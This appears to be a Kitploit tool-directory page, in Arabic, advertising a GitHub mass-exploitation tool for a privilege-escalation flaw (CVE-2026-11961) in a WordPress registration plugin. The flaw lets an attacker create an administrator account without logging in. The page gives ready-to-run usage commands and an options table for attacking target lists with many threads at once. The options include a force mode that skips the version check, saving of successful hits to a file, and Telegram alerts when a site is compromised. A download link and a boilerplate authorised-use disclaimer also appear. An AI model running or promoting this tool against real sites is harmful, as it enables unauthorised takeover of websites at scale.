Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-11961 — CVE-2026-11961 — UserRegistration: تسجيل مستخدم ووردبريس <= 5.2.2 تصعيد الامتيازات. أدوار عضوية مُهيأة بشكل خاطئ ← إنشاء مسؤول غير مصادق ← اختراق الموقع. CVSS 8.1 | Kitploit
أدوات/GitHubGitHub/johenlastgen-jlg/cve-2026-11961
تصعيد الامتيازاتماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقسوء التكوين

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
johenlastgen-jlg/cve-2026-11961

CVE-2026-11961

CVE-2026-11961 — UserRegistration: تسجيل مستخدم ووردبريس <= 5.2.2 تصعيد الامتيازات. أدوار عضوية مُهيأة بشكل خاطئ ← إنشاء مسؤول غير مصادق ← اختراق الموقع. CVSS 8.1

عرض المستودع
16منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-11961

أداة استغلال جماعي لثغرة CVE-2026-11961 التي تؤثر على إضافة WordPress User Registration & Membership.

الميزات

  • كشف إصدار الإضافة
  • دعم هدف واحد
  • معالجة دفعات من الأهداف
  • دعم تعدد الخيوط
  • بيانات اعتماد عشوائية أو مخصصة
  • دعم بروكسي HTTP/HTTPS
  • إعداد مهلة الطلب
  • إخراج بصيغة JSONL
  • دعم ملفات السجل
  • إشعارات تيليغرام
  • الوضع الإجباري (--force)

الاستخدام

root@kitploit:~
# Show help
python3 mass.py -h

# Single target
python3 mass.py -u https://target.com

# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"

# Multiple targets
python3 mass.py -l targets.txt -t 20

# Save successful results
python3 mass.py -l targets.txt -o results.jsonl

# Write log file
python3 mass.py -l targets.txt --log exploit.log

# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID

# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080

# Force mode
python3 mass.py -u https://target.com --force

الخيارات

إخلاء مسؤولية

هذا المشروع مقدم حصريًا لتقييمات الأمان المصرح بها، وبحوث الأمن الدفاعي، والتحقق من الثغرات.

باستخدامك لهذا البرنامج، فأنت تؤكد أن لديك تفويضًا صريحًا لتقييم الأنظمة المستهدفة. الوصول غير المصرح به إلى أنظمة الكمبيوتر محظور وقد يخالف القوانين المعمول بها.

المؤلف والمساهمون لا يشجعون أو يتغاضون عن الاستخدام غير المصرح به لهذا المشروع، ولا يتحملون أي مسؤولية أو التزام تجاه أي إساءة استخدام أو ضرر أو عواقب قانونية ناتجة عن استخدامه.

المؤلف

JohenLastGen JLG NETWORK

تنزيل الأداة
OptionDescription
-h, --helpعرض رسالة المساعدة والخروج
-u, --urlرابط هدف واحد
-l, --listملف يحتوي على روابط الأهداف (سطر لكل هدف)
--usernameاسم مستخدم مدير (الافتراضي: يتم توليده عشوائيًا)
--passwordكلمة مرور المدير (الافتراضي: يتم توليدها عشوائيًا)
-t, --threadsعدد الخيوط المتزامنة (الافتراضي: 5)
--timeoutمهلة الطلب بالثواني (الافتراضي: 15)
-o, --outputحفظ النتائج الناجحة في ملف JSONL
--logحفظ سجلات الطرفية في ملف
--proxyبروكسي HTTP/HTTPS (مثل: http://127.0.0.1:8080)
--forceتخطي التحقق من الإصدار ومتابعة المعالجة
--tg-tokenرمز بوت تيليغرام
--tg-chatمعرف دردشة تيليغرام